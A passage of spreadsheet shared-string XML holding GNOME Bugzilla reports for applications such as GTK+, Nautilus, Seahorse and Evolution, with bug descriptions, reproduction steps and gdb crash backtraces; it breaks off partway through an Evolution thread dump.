  </si>
  <si>
    <t>memprof-maint</t>
  </si>
  <si>
    <t>GNOME-UTILS-166303</t>
  </si>
  <si>
    <t>Use new gnome_desktop_item_set_launch_time() API</t>
  </si>
  <si>
    <t>Bug 150910 added a new gnome_desktop_item_set_launch_time() API.  All users of
gnome_desktop_item_launch* should be using this API.  I did a search through all
code paths that call any such function and all code paths are such that
gtk_get_current_event_time() will return the right result (i.e. they're all in
signal handlers such as activate clicked or button_press).  So the patch is
pretty easy--I'll attach it in a minute.</t>
  </si>
  <si>
    <t>GNOME-POWER-MANAGER-425000</t>
  </si>
  <si>
    <t>applets</t>
  </si>
  <si>
    <t>add bug-buddy support to the applets</t>
  </si>
  <si>
    <t>Here is a patch tjat adds the necessary fields to the .server files</t>
  </si>
  <si>
    <t>DEVHELP-517003</t>
  </si>
  <si>
    <t>Translated strings are not being used in gedit's plugin</t>
  </si>
  <si>
    <t>The strings that are used in gedit's plugins don't show up translated in gedit.
This despite them being marked for translation and translated in devhelp's po files.
To test build latest both gedit and devhelp and start gedit (With Arabic which currently has 100% translation). You'll notice that the string Show API documentation in the menu item is not being translated.
This could be as simple as setting the gettext domain.</t>
  </si>
  <si>
    <t>devhelp-maint</t>
  </si>
  <si>
    <t>djihed</t>
  </si>
  <si>
    <t>GTK+-346831</t>
  </si>
  <si>
    <t>GtkTextView validation crash with Quartz backend</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Compile Gtk with the Quartz backend
2. Run testtext in gtk+/tests
3. Paste a large amount of text (a couple of pages is good) into the text view. A scrollbar will appear.
4. Hold the mouse button inside the text view to begin selecting text. Drag the mouse upwards until it passes the top of the window. The text should scroll but instead a crash occurs.
Stack trace:
Program received signal SIGABRT Aborted.
0x9004802c in kill ()
(gdb) bt
#0  0x9004802c in kill ()
#1  0x9012dfb4 in abort ()
#2  0x006a942c in g_logv (log_domain=0x13e26e8 Gtk log_level=G_LOG_LEVEL_ERROR format=0x6f072c file %s: line %d (%s): should not be reached args1=0xbfffae94 \001AmX) at gmessages.c:497
#3  0x006a951c in g_log (log_domain=0x13e26e8 Gtk log_level=G_LOG_LEVEL_ERROR format=0x6f072c file %s: line %d (%s): should not be reached) at gmessages.c:517
#4  0x006a9650 in g_assert_warning (log_domain=0x13e26e8 Gtk file=0x1416d58 gtktextview.c line=4205 pretty_function=0x1417c40 gtk_text_view_paint expression=0x0) at gmessages.c:552
#5  0x012cd3a8 in gtk_text_view_paint (widget=0x255e030 area=0xbfffb7b0 event=0xbfffb7a4) at gtktextview.c:4205
#6  0x012cd558 in gtk_text_view_expose_event (widget=0x255e030 event=0xbfffb7a4) at gtktextview.c:4251
#7  0x01191528 in _gtk_marshal_BOOLEAN__BOXED (closure=0x2436e80 return_value=0xbfffb1e4 n_param_values=2 param_values=0xbfffb38c invocation_hint=0xbfffb1d0 marshal_data=0x12cd4c0) at gtkmarshalers.c:83
#8  0x005b9550 in g_type_class_meta_marshal (closure=0x2436e80 return_value=0xbfffb1e4 n_param_values=2 param_values=0xbfffb38c invocation_hint=0xbfffb1d0 marshal_data=0xc8) at gclosure.c:567
#9  0x005b9128 in g_closure_invoke (closure=0x2436e80 return_value=0xbfffb1e4 n_param_values=2 param_values=0xbfffb38c invocation_hint=0xbfffb1d0) at gclosure.c:490
#10 0x005d817c in signal_emit_unlocked_R (node=0x24371b0 detail=0 instance=0x255e030 emission_return=0xbfffb4d0 instance_and_params=0xbfffb38c) at gsignal.c:2476
#11 0x005d6cf4 in g_signal_emit_valist (instance=0x255e030 signal_id=50 detail=0 var_args=0xbfffb628 ???&lt;@) at gsignal.c:2207
#12 0x005d7050 in g_signal_emit (instance=0x255e030 signal_id=50 detail=0) at gsignal.c:2241
#13 0x0137402c in gtk_widget_event_internal (widget=0x255e030 event=0xbfffb7a4) at gtkwidget.c:3901
#14 0x01373b08 in gtk_widget_send_expose (widget=0x255e030 event=0xbfffb7a4) at gtkwidget.c:3738
#15 0x0118ce9c in gtk_main_do_event (event=0xbfffb7a4) at gtkmain.c:1379
#16 0x00248f9c in -[GdkQuartzView drawRect:] (self=0x3107a60 _cmd=0x90a8f4a0 rect={origin = {x = 0 y = 0} size = {width = 402 height = 428}}) at GdkQuartzView.c:76
#17 0x93734858 in -[NSView _drawRect:clip:] ()
#18 0x93733e18 in -[NSView _recursiveDisplayAllDirtyWithLockFocus:visRect:] ()
#19 0x93736b60 in _recursiveDisplayInRect2 ()
#20 0x907eb3c4 in CFArrayApplyFunction ()
#21 0x93733f2c in -[NSView _recursiveDisplayAllDirtyWithLockFocus:visRect:] ()
#22 0x93736b60 in _recursiveDisplayInRect2 ()
#23 0x907eb3c4 in CFArrayApplyFunction ()
#24 0x93733f2c in -[NSView _recursiveDisplayAllDirtyWithLockFocus:visRect:] ()
#25 0x93736b60 in _recursiveDisplayInRect2 ()
#26 0x907eb3c4 in CFArrayApplyFunction ()
#27 0x93733f2c in -[NSView _recursiveDisplayAllDirtyWithLockFocus:visRect:] ()
#28 0x937333e0 in -[NSView _recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:] ()
#29 0x9372d054 in -[NSView _displayRectIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:] ()
#30 0x93722348 in -[NSView displayIfNeeded] ()
#31 0x0024d754 in gdk_window_impl_quartz_process_updates (paintable=0x7fe3d0 update_children=0) at gdkwindow-quartz.c:212
#32 0x00236b40 in gdk_window_process_updates (window=0x7fd058 update_children=0) at gdkwindow.c:2425
#33 0x012044b4 in gtk_range_adjustment_value_changed (adjustment=0x7fe0d0 data=0x255b0a0) at gtkrange.c:1995
#34 0x005d8de0 in g_cclosure_marshal_VOID__VOID (closure=0x244fe80 return_value=0x0 n_param_values=1 param_values=0xbfffca5c invocation_hint=0xbfffc8a0 marshal_data=0x0) at gmarshal.c:77
#35 0x005b9128 in g_closure_invoke (closure=0x244fe80 return_value=0x0 n_param_values=1 param_values=0xbfffca5c invocation_hint=0xbfffc8a0) at gclosure.c:490
#36 0x005d7eb4 in signal_emit_unlocked_R (node=0x244e140 detail=0 instance=0x7fe0d0 emission_return=0x0 instance_and_params=0xbfffca5c) at gsignal.c:2438
#37 0x005d6c74 in g_signal_emit_valist (instance=0x7fe0d0 signal_id=122 detail=0 var_args=0xbfffccf4 ????) at gsignal.c:2197
#38 0x005d7050 in g_signal_emit (instance=0x7fe0d0 signal_id=122 detail=0) at gsignal.c:2241
#39 0x010215a4 in gtk_adjustment_value_changed (adjustment=0x7fe0d0) at gtkadjustment.c:363
#40 0x010213dc in gtk_adjustment_set_value (adjustment=0x7fe0d0 value=3514) at gtkadjustment.c:346
#41 0x012c49d8 in set_adjustment_clamped (adj=0x7fe0d0 val=3514) at gtktextview.c:1427
#42 0x012c4fe4 in gtk_text_view_scroll_to_iter (text_view=0x255e030 iter=0xbfffcf94 within_margin=0 use_align=0 xalign=0 yalign=0) at gtktextview.c:1565
#43 0x012c55e0 in gtk_text_view_flush_scroll (text_view=0x255e030) at gtktextview.c:1712
#44 0x012ca5fc in gtk_text_view_flush_first_validate (text_view=0x255e030) at gtktextview.c:3216
#45 0x012cd2f4 in gtk_text_view_paint (widget=0x255e030 area=0xbfffd930 event=0xbfffd924) at gtktextview.c:4186
#46 0x012cd558 in gtk_text_view_expose_event (widget=0x255e030 event=0xbfffd924) at gtktextview.c:4251
#47 0x01191528 in _gtk_marshal_BOOLEAN__BOXED (closure=0x2436e80 return_value=0xbfffd364 n_param_values=2 param_values=0xbfffd50c invocation_hint=0xbfffd350 marshal_data=0x12cd4c0) at gtkmarshalers.c:83
#48 0x005b9550 in g_type_class_meta_marshal (closure=0x2436e80 return_value=0xbfffd364 n_param_values=2 param_values=0xbfffd50c invocation_hint=0xbfffd350 marshal_data=0xc8) at gclosure.c:567
#49 0x005b9128 in g_closure_invoke (closure=0x2436e80 return_value=0xbfffd364 n_param_values=2 param_values=0xbfffd50c invocation_hint=0xbfffd350) at gclosure.c:490
#50 0x005d817c in signal_emit_unlocked_R (node=0x24371b0 detail=0 instance=0x255e030 emission_return=0xbfffd650 instance_and_params=0xbfffd50c) at gsignal.c:2476
#51 0x005d6cf4 in g_signal_emit_valist (instance=0x255e030 signal_id=50 detail=0 var_args=0xbfffd7a8 ??×¼@) at gsignal.c:2207
#52 0x005d7050 in g_signal_emit (instance=0x255e030 signal_id=50 detail=0) at gsignal.c:2241
#53 0x0137402c in gtk_widget_event_internal (widget=0x255e030 event=0xbfffd924) at gtkwidget.c:3901
#54 0x01373b08 in gtk_widget_send_expose (widget=0x255e030 event=0xbfffd924) at gtkwidget.c:3738
#55 0x0118ce9c in gtk_main_do_event (event=0xbfffd924) at gtkmain.c:1379
#56 0x00248f9c in -[GdkQuartzView drawRect:] (self=0x3107a60 _cmd=0x90a8f4a0 rect={origin = {x = 0 y = 0} size = {width = 402 height = 428}}) at GdkQuartzView.c:76
#57 0x93734858 in -[NSView _drawRect:clip:] ()
#58 0x937335fc in -[NSView _recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:] ()
#59 0x937339a8 in -[NSView _recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:] ()
#60 0x937339a8 in -[NSView _recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:] ()
#61 0x937339a8 in -[NSView _recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:] ()
#62 0x937339a8 in -[NSView _recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:] ()
#63 0x93754044 in -[NSThemeFrame _recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:] ()
#64 0x9372d054 in -[NSView _displayRectIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:] ()
#65 0x93722348 in -[NSView displayIfNeeded] ()
#66 0x937221b8 in -[NSWindow displayIfNeeded] ()
#67 0x93722064 in _handleWindowNeedsDisplay ()
#68 0x907db73c in __CFRunLoopDoObservers ()
#69 0x907db9dc in __CFRunLoopRun ()
#70 0x907db47c in CFRunLoopRunSpecific ()
#71 0x931eb740 in RunCurrentEventLoopInMode ()
#72 0x931ead4c in ReceiveNextEventCommon ()
#73 0x931eac40 in BlockUntilNextEventMatchingListInMode ()
#74 0x936eeae4 in _DPSNextEvent ()
#75 0x936ee7a8 in -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] ()
#76 0x0023f5f8 in gdk_event_prepare (source=0x24289b0 timeout=0xbffff570) at gdkevents-quartz.c:68
#77 0x0069d11c in g_main_context_prepare (context=0x24289f0 priority=0xbffff62c) at gmain.c:2362
#78 0x0069e480 in g_main_context_iterate (context=0x24289f0 block=1 dispatch=1 self=0x243db50) at gmain.c:2655
#79 0x0069f210 in g_main_loop_run (loop=0x310a940) at gmain.c:2879
#80 0x0118bff8 in gtk_main () at gtkmain.c:1000
#81 0x000126bc in main (argc=1 argv=0xbffff8f8) at testtext.c:3020
Other information:
The following error is printed:
(testtext:25179): Gtk-WARNING **: gtktextview.c:4204: somehow some text lines were modified or scrolling occurred since the last validation of lines on the screen - may be a text widget bug.
Gtk-ERROR **: file gtktextview.c: line 4205 (gtk_text_view_paint): should not be reached
aborting...</t>
  </si>
  <si>
    <t>GUCHARMAP-349249</t>
  </si>
  <si>
    <t>section on browsing is too wordy</t>
  </si>
  <si>
    <t>3.5.â€ƒTo Browse Through all Characters is unnecessarily complex.
There is no need to list every possible action in the Go menu. This makes the section very hard to read and take in.
Instead of:
Choose Go â†’ Next Script or Go â†’ Next Block to select the next character set. 
Choose Go â†’ Previous Script or Go â†’ Previous Block to select the previous character set.
this should suffice:
Use the Go menu to browse through the character map by individual character or by script.
(One should assume the user is ignorant of the particular application but a generally intelligent person.)
Is it OK if I (or another docs team member) makes changes to the manual directly in CVS?</t>
  </si>
  <si>
    <t>jnoreiko</t>
  </si>
  <si>
    <t>NAUTILUS-114278</t>
  </si>
  <si>
    <t>Crash when pressing Up while playing .ogg's</t>
  </si>
  <si>
    <t xml:space="preserve">Package: nautilus
Severity: normal
Version: GNOME2.2.2 0.2.2
os_details: GNOME.Org
Synopsis: Crash when pressing Up while playing .ogg's
Bugzilla-Product: nautilus
Bugzilla-Component: nautilus-media
BugBuddy-GnomeVersion: 2.0 (2.2.0.1)
Description:
Description of Problem:
Get this crash when doing the above:
#0  0x40b75219 in __wait4 () at __wait4:-1
#1  0x40bf0e34 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x408206d3 in waitpid (pid=32648 stat_loc=0xbfffe59c options=0)
    at wrapsyscall.c:172
#3  0x401fda34 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:652
#4  0x4081ea65 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds =
43 __dsh = 49168 edi = 0 esi = 136083704 ebp = 3221219832 esp =
3221219796 ebx = 1084987328 edx = 1 ecx = 0 eax = 135125184 trapno
= 14 err = 4 eip = 134529979 cs = 35 __csh = 0 eflags = 66182
esp_at_signal = 3221219796 ss = 43 __ssh = 0 fpstate = 0xbfffe758
oldmask = 2147483648 cr2 = 24}) at signals.c:97
#5  
#6  tick_timeout (play=0x80dd8c0) at audio-play.c:285
#7  0x40a78e60 in g_timeout_dispatch (source=0x81c78f8
    callback=0x804c3ac  user_data=0x80dd8c0) at
gmain.c:3016
#8  0x40a769ca in g_main_dispatch (context=0x806b0e8) at gmain.c:1653
#9  0x40a777e1 in g_main_context_dispatch (context=0x806b0e8)
    at gmain.c:2197
#10 0x40a77b74 in g_main_context_iterate (context=0x806b0e8 block=1
    dispatch=1 self=0x805b830) at gmain.c:2278
#11 0x40a7821a in g_main_loop_run (loop=0x809e980) at gmain.c:2498
#12 0x40435817 in gtk_main () at gtkmain.c:1093
#13 0x40027b2d in nautilus_view_standard_main_multi (
    executable_name=0x8052863 nautilus-audio-view
    version=0x805285d 0.2.2 gettext_package_name=0x0
    gettext_locale_directory=0x0 argc=3 argv=0xbfffec94
    factory_iid=0x8052880 OAFIID:Nautilus_Audio_View_Factory
    view_iids=0xbfffebc0
    create_function=0x804bcc0
post_initialize_callback=0 user_data=0x804f5a0)
    at nautilus-view-standard-main.c:329
#14 0x40027d01 in nautilus_view_standard_main (
    executable_name=0x8052863 nautilus-audio-view
    version=0x805285d 0.2.2 gettext_package_name=0x0
    gettext_locale_directory=0x0 argc=3 argv=0xbfffec94
    factory_iid=0x8052880 OAFIID:Nautilus_Audio_View_Factory
    view_iid=0x8052842 OAFIID:Nautilus_Audio_View
    create_function=0x804bcc0
post_initialize_callback=0 user_data=0x804f5a0)
    at nautilus-view-standard-main.c:413
#15 0x0804f8ed in main (argc=3 argv=0xbfffec94) at main.c:53
#16 0x40ad6657 in __libc_start_main (main=0x804f8b8  argc=3
    ubp_av=0xbfffec94 init=0x804b3c8  fini=0x8051ac0 
    rtld_fini=0x4000dcd4  stack_end=0xbfffec8c)
    at ../sysdeps/generic/libc-start.c:129
(gdb)
Steps to reproduce the problem:
1. Play a dir with ogg's only
2. Press Up in nautilus
3. Watch it crash.
Actual Results:
Expected Results:
How often does this happen?
Additional Information:
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-06-02 15:28 -------
Reassigning to the default owner of the component thomas@urgent.rug.ac.be.
</t>
  </si>
  <si>
    <t>GSTREAMER-369912</t>
  </si>
  <si>
    <t>missing inclusion in rpm spec file</t>
  </si>
  <si>
    <t>The following files are not included for package generation in file gst-plugins-bad.spec.in :
%{_libdir}/gstreamer-%{majorminor}/libgstdeinterlace.so
%{_libdir}/gstreamer-%{majorminor}/libgstdtsdec.so
%{_libdir}/gstreamer-%{majorminor}/libgstgsm.so
%{_libdir}/gstreamer-%{majorminor}/libgstmultifilesink.so
%{_libdir}/gstreamer-%{majorminor}/libgstmusepack.so
%{_libdir}/gstreamer-%{majorminor}/libgstnuvdemux.so
%{_libdir}/gstreamer-%{majorminor}/libgstreplaygain.so
%{_libdir}/gstreamer-%{majorminor}/libgstvideocrop.so</t>
  </si>
  <si>
    <t>spglegle</t>
  </si>
  <si>
    <t>TOTEM-125903</t>
  </si>
  <si>
    <t>Window size problem</t>
  </si>
  <si>
    <t>When totem is run the window size is the same size as previous and the
window can't be made smaller.
Run totem set the window for a size you like and exit. The next time totem
is up the window is the same size and can't be set smaller.</t>
  </si>
  <si>
    <t>louisg00</t>
  </si>
  <si>
    <t>DIA-349765</t>
  </si>
  <si>
    <t>objects</t>
  </si>
  <si>
    <t>Mistakes in display of the russian text in comments in UML diagrams.</t>
  </si>
  <si>
    <t>Please describe the problem:
Russian text in comments to UML diagrams shows with mistakes.
It is Ok in dialogue in .dia file but bad on screen and exported png.
It is remarkable that the similar bug is not noticed in class name.
The wrong behaviour does not reproduce on use dia.exe instead of diaw.exe
Steps to reproduce:
1. Run diaw.exe
2. Create diagram
3. Add UML class to diagram
4. Type in russain text in comment
5. Check in checkbox that control visibility of comments
6. Click ok
Actual results:
Fist characters of text will be skiped or replaced by '?'
Expected results:
I expect the text as I have entered it in dialogue. 
Does this happen every time?
Yes
Other information:
Yes. I have .dia file screenshot and two .png (from dia.exe and diaw.exe)
But I don't know how to attach it to this request</t>
  </si>
  <si>
    <t>SEAHORSE-527193</t>
  </si>
  <si>
    <t>seahorse-agent crashes trying to prompt for passphrase when I attempt to perform gpg --sign</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. .xsession/.xinitrc have ssh-agent dbus-launch --exit-with-session seahorse-agent --execute gnome-session
2. Run startx
3. X loads bring up a terminal
4. Run gpg --sign &lt; some_file.txt
5. GPG expresses that there's an agent error and asks for the passphrase manually
6. The agent error is because seahorse-agent crashed in mid-protocol
Stack trace:
(gdb) bt
#0  0x0000000806ded01c in kill () from /lib/libc.so.7
#1  0x0000000806debe4b in abort () from /lib/libc.so.7
#2  0x00000008064004fa in g_logv () from /usr/local/lib/libglib-2.0.so.0
#3  0x0000000806400593 in g_log () from /usr/local/lib/libglib-2.0.so.0
#4  0x00000008063ff336 in g_malloc () from /usr/local/lib/libglib-2.0.so.0
#5  0x0000000806416d19 in g_strndup () from /usr/local/lib/libglib-2.0.so.0
#6  0x0000000806428714 in g_vasprintf () from /usr/local/lib/libglib-2.0.so.0
#7  0x0000000806416800 in g_strdup_vprintf ()
   from /usr/local/lib/libglib-2.0.so.0
#8  0x00000008064002fd in g_logv () from /usr/local/lib/libglib-2.0.so.0
#9  0x0000000806400593 in g_log () from /usr/local/lib/libglib-2.0.so.0
#10 0x00000008063ff336 in g_malloc () from /usr/local/lib/libglib-2.0.so.0
#11 0x0000000000428d0a in seahorse_secure_entry_init (entry=0x61e280)
    at seahorse-secure-entry.c:506
#12 0x00000008062ad0e0 in g_type_create_instance ()
   from /usr/local/lib/libgobject-2.0.so.0
#13 0x000000080629293d in g_object_set ()
   from /usr/local/lib/libgobject-2.0.so.0
#14 0x0000000806292f5e in g_object_newv ()
   from /usr/local/lib/libgobject-2.0.so.0
#15 0x0000000806293a50 in g_object_new_valist ()
   from /usr/local/lib/libgobject-2.0.so.0
#16 0x0000000806293b91 in g_object_new ()
   from /usr/local/lib/libgobject-2.0.so.0
#17 0x000000000042cedb in seahorse_secure_entry_new ()
    at seahorse-secure-entry.c:2244
#18 0x0000000000421b5e in seahorse_passphrase_prompt_show (
    title=0x44f065 Passphrase 
    description=0x651500 You need a passphrase to unlock the secret key for use
r:\n\Coleman Kane (Personal PGP Key) \\n1024-bit DSA key I
D C5DAB797 created 2007-07-22\n prompt=0x6f1e00 Passphrase: check=0x0 
    confirm=0) at seahorse-passphrase.c:247
#19 0x0000000000412ee9 in seahorse_agent_prompt_pass (pr=0x7b8390)
    at seahorse-agent-prompt.c:156
#20 0x0000000000411ab0 in seahorse_agent_actions_nextgui ()
    at seahorse-agent-actions.c:234
#21 0x00000000004117c6 in seahorse_agent_actions_getpass (rq=0x7190c0 
    flags=0 id=0x7224ff FC09F3264318E714DE456CB070C4B141C5DAB797 
    errmsg=0x0 prompt=0x0 
    desc=0x72252c You need a passphrase to unlock the secret key for user:\n\C
oleman Kane (Personal PGP Key) \\n1024-bit DSA key ID C5DAB
797 created 2007-07-22\n) at seahorse-agent-actions.c:135
#22 0x00000000004142c7 in process_line (cn=0x7190c0 
    string=0x7224f0 GET_PASSPHRASE) at seahorse-agent-io.c:447
#23 0x0000000000414533 in io_handler (source=0x658400 condition=G_IO_IN 
    data=0x7190c0) at seahorse-agent-io.c:524
---Type  to continue or q  to quit---
#24 0x00000008063f79e1 in g_main_context_dispatch ()
   from /usr/local/lib/libglib-2.0.so.0
#25 0x00000008063fac56 in g_main_context_check ()
   from /usr/local/lib/libglib-2.0.so.0
#26 0x00000008063faef9 in g_main_loop_run ()
   from /usr/local/lib/libglib-2.0.so.0
#27 0x0000000803912bc2 in gtk_main () from /usr/local/lib/libgtk-x11-2.0.so.0
#28 0x000000000041147d in main (argc=3 argv=0x7fffffffeaf0)
    at seahorse-agent-main.c:271
Other information:
Output of crashing session by running seahorse-agent as seahorse-agent -c -d -A and setting GPG_AGENT_INFO appropriately in another xterm to test gpg:
cokane@erwin:~&gt; seahorse-agent -c -d -A
setenv GPG_AGENT_INFO /var/tmp/seahorse-VqwNoP/S.gpg-agent:14755:1
/usr/local/share/themes/Beastie/gtk-2.0/gtkrc:56: Clearlooks configuration option menuitemstyle is not supported and
 will be ignored.
/usr/local/share/themes/Beastie/gtk-2.0/gtkrc:57: Clearlooks configuration option listviewitemstyle is not supported
 and will be ignored.
/usr/local/share/themes/Beastie/gtk-2.0/gtkrc:58: Clearlooks configuration option progressbarstyle is not supported 
and will be ignored.
[multi-operation 0x006EA5E0] start
[multi-operation 0x006EA5E0] adding part: 0x006F0D30
[multi-operation 0x006EA5E0] single progress: Loaded 200 keys 0.000000
[multi-operation 0x006EA5E0] adding part: 0x007AD5C0
[multi-operation 0x006EA5E0] part complete (2): 0x007AD5C0/(null)
    progres is: 1.000000
    progres is: 0.000000
[multi-operation 0x006EA5E0] multi progress: Loaded 200 keys 0.500000
[multi-operation 0x006EA4A0] start
[multi-operation 0x006EA4A0] adding part: 0x006EA5E0
[multi-operation 0x006EA4A0] single progress: Loaded 200 keys 0.500000
[multi-operation 0x006EA4A0] adding part: 0x007D4C00
[multi-operation 0x006EA4A0] part complete (2): 0x007D4C00/(null)
    progres is: 1.000000
    progres is: 0.500000
[multi-operation 0x006EA4A0] multi progress: Loaded 200 keys 0.750000
    progres is: 1.000000
    progres is: 1.000000
[multi-operation 0x006EA5E0] multi progress: (null) 1.000000
    progres is: 1.000000
    progres is: 1.000000
[multi-operation 0x006EA4A0] multi progress: (null) 1.000000
[multi-operation 0x006EA5E0] part complete (2): 0x006F0D30/(null)
[multi-operation 0x006EA5E0] complete
    progres is: 1.000000
    progres is: 1.000000
[multi-operation 0x006EA4A0] multi progress: (null) 1.000000
[multi-operation 0x006EA4A0] part complete (2): 0x006EA5E0/(null)
[multi-operation 0x006EA4A0] complete
[agent-io] send line:
OK your orders please
[agent-io] got line:
OPTION display=:0.0
[agent-io] send line:
OK 
[agent-io] got line:
OPTION ttyname=/dev/tty
[agent-io] send line:
OK 
[agent-io] got line:
OPTION ttytype=xterm
[agent-io] send line:
OK 
[agent-io] got line:
OPTION lc-ctype=en_US.UTF-8
[agent-io] send line:
OK 
[agent-io] got line:
OPTION lc-messages=en_US.UTF-8
[agent-io] send line:
OK 
[agent-io] got line:
GET_PASSPHRASE FC09F3264318E714DE456CB070C4B141C5DAB797 X X You+need+a+passphrase+to+unlock+the+secret+key+for+user:%0
AColeman+Kane+(Personal+PGP+Key)+%0A1024-bit+DSA+key+ID+C5DAB797+created+2007-07-22%0A
** (seahorse-agent:14755): WARNING **: couldn't search keyring: (code 9)
(process:14755): GLib-ERROR (recursed) **: gmem.c:136: failed to allocate 40 bytes
aborting...
(process:14755): GLib-ERROR (recursed) **: gmem.c:136: failed to allocate 108 bytes
aborting...
Multiple segmentation faults occurred can't display error dialog</t>
  </si>
  <si>
    <t>cokane</t>
  </si>
  <si>
    <t>EVOLUTION-498977</t>
  </si>
  <si>
    <t>Evolution crashes when sending a mail</t>
  </si>
  <si>
    <t>Was sending a mail when evolution crashed. It crashes everytime I try to send an email:
(evolution:6813): GLib-CRITICAL **: g_base64_encode: assertion `data != NULL' failed
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread 0xb12ebb90 (LWP 6820)]
0xb664ef73 in strlen () from /lib/libc.so.6
(gdb) where
#0  0xb664ef73 in strlen () from /lib/libc.so.6
#1  0xb1348c79 in send_as_attachment (cnc=0x80ae830 item=0xabebf370 content=0x93216f0 type=0xac0a1b38 dw=0xad6e0ccc filename=0xabe25a30 if3.reg
    cid=0x0 attach_list=0xb12eb220) at camel-groupwise-utils.c:318
#2  0xb13490a8 in do_multipart (cnc=0x80ae830 item=0xabebf370 mp=0xad6de668 attach_list=0xb12eb220) at camel-groupwise-utils.c:696
#3  0xb1349882 in camel_groupwise_util_item_from_message (cnc=0x80ae830 message=0xad6d2248 from=0x9299f24) at camel-groupwise-utils.c:425
#4  0xb134a218 in groupwise_send_to (transport=0xabe61338 message=0xad6d2248 from=0x9299f24 recipients=0x92780c0 ex=0xb12eb34c)
    at camel-groupwise-transport.c:190
#5  0xb7d4112b in camel_transport_send_to (transport=0xabe61338 message=0xad6d2248 from=0x9299f24 recipients=0x92780c0 ex=0xb12eb34c)
    at camel-transport.c:136
#6  0xb5fca170 in send_queue_send (mm=0x8f225e8) at mail-ops.c:526
#7  0xb5fc5795 in mail_msg_received (e=0x8141300 msg=0x8f225e8 data=0x0) at mail-mt.c:582
#8  0xb7960a1b in thread_dispatch (din=0x8141300) at e-msgport.c:1005
#9  0xb714f192 in start_thread () from /lib/libpthread.so.0
#10 0xb66a502e in clone () from /lib/libc.so.6
(gdb) thread apply all bt
Thread 18 (Thread 0xb02c9b90 (LWP 6867)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb7156348 in recv () from /lib/libpthread.so.0
#2  0xb7869f68 in ?? () from /usr/lib/libgnutls.so.13
#3  0x00000032 in ?? ()
#4  0x09d342b8 in ?? ()
#5  0x00000005 in ?? ()
#6  0x00000000 in ?? ()
Thread 16 (Thread 0xacd25b90 (LWP 6840)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb669b817 in poll () from /lib/libc.so.6
#2  0xb6747815 in ?? () from /usr/lib/libglib-2.0.so.0
#3  0xae8011d8 in ?? ()
#4  0x00000001 in ?? ()
#5  0xffffffff in ?? ()
#6  0xae8011d8 in ?? ()
#7  0x00000001 in ?? ()
#8  0x08065660 in ?? ()
#9  0x08065600 in ?? ()
#10 0xacd25334 in ?? ()
#11 0x00000001 in ?? ()
#12 0x00000001 in ?? ()
#13 0x091174d0 in ?? ()
#14 0xae8011d8 in ?? ()
#15 0xb669b7a0 in ?? () from /lib/libc.so.6
#16 0xb7152b70 in ?? () from /lib/libpthread.so.0
#17 0xb7151420 in ?? () from /lib/libpthread.so.0
#18 0xb6767562 in g_thread_self () from /usr/lib/libglib-2.0.so.0
#19 0xb6747bc7 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#20 0xb7cb96d2 in startup_mainloop (arg=0x0) at e-book.c:3794
#21 0xb6767aef in ?? () from /usr/lib/libglib-2.0.so.0
#22 0x00000000 in ?? ()
Thread 15 (Thread 0xad5beb90 (LWP 6839)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb7155c1e in __lll_mutex_lock_wait () from /lib/libpthread.so.0
#2  0xb7151a58 in _L_mutex_lock_86 () from /lib/libpthread.so.0
#3  0xb715147d in pthread_mutex_lock () from /lib/libpthread.so.0
#4  0xb6768240 in g_static_rec_mutex_lock () from /usr/lib/libglib-2.0.so.0
#5  0xb1340ed1 in groupwise_sync (folder=0x97053d8 expunge=0 ex=0xad5be354) at camel-groupwise-folder.c:625
#6  0xb1342a28 in groupwise_refresh_folder (folder=0x97053d8 ex=0xad5be354) at camel-groupwise-folder.c:1034
#7  0xb1342f9f in groupwise_refresh_info (folder=0x97053d8 ex=0xad5be354) at camel-groupwise-folder.c:990
#8  0xb7d263be in camel_folder_refresh_info (folder=0x97053d8 ex=0xad5be354) at camel-folder.c:302
#9  0xb5fcbf17 in refresh_folders_get (mm=0xad6ec968) at mail-send-recv.c:797
#10 0xb5fc5795 in mail_msg_received (e=0x8141300 msg=0xad6ec968 data=0x0) at mail-mt.c:582
#11 0xb7960a1b in thread_dispatch (din=0x8141300) at e-msgport.c:1005
#12 0xb714f192 in start_thread () from /lib/libpthread.so.0
#13 0xb66a502e in clone () from /lib/libc.so.6
Thread 13 (Thread 0xad5ffb90 (LWP 6836)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb669b817 in poll () from /lib/libc.so.6
#2  0xb6747815 in ?? () from /usr/lib/libglib-2.0.so.0
---Type  to continue or q  to quit---
#3  0x0911e1f0 in ?? ()
#4  0x00000009 in ?? ()
#5  0xffffffff in ?? ()
#6  0x0911e1f0 in ?? ()
#7  0x00000009 in ?? ()
#8  0x08065660 in ?? ()
#9  0x08065600 in ?? ()
#10 0xad5ff344 in ?? ()
#11 0x00000001 in ?? ()
#12 0x00000001 in ?? ()
#13 0x09005b80 in ?? ()
#14 0x0911e1f0 in ?? ()
#15 0xb669b7a0 in ?? () from /lib/libc.so.6
#16 0xb7152b70 in ?? () from /lib/libpthread.so.0
#17 0xb7151420 in ?? () from /lib/libpthread.so.0
#18 0xb6767562 in g_thread_self () from /usr/lib/libglib-2.0.so.0
